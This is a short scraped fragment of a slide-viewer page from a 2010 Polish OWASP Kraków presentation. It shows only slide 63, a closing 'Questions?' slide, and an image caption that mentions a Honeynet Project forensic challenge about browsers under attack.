![Page 63: OWASP, Kraków, 2010-06-10 · 2020-01-17 · OWASP 5 Gość specjalny: Przykładowy incydent Źródło: Honeynet Project Challenges Forensic Challenge 2010 - browsers under attack](https://reader033.fdocuments.in/reader033/viewer/2022050406/5f832eb004f804004943e284/html5/thumbnails/63.jpg)
63OWASP
Pytania?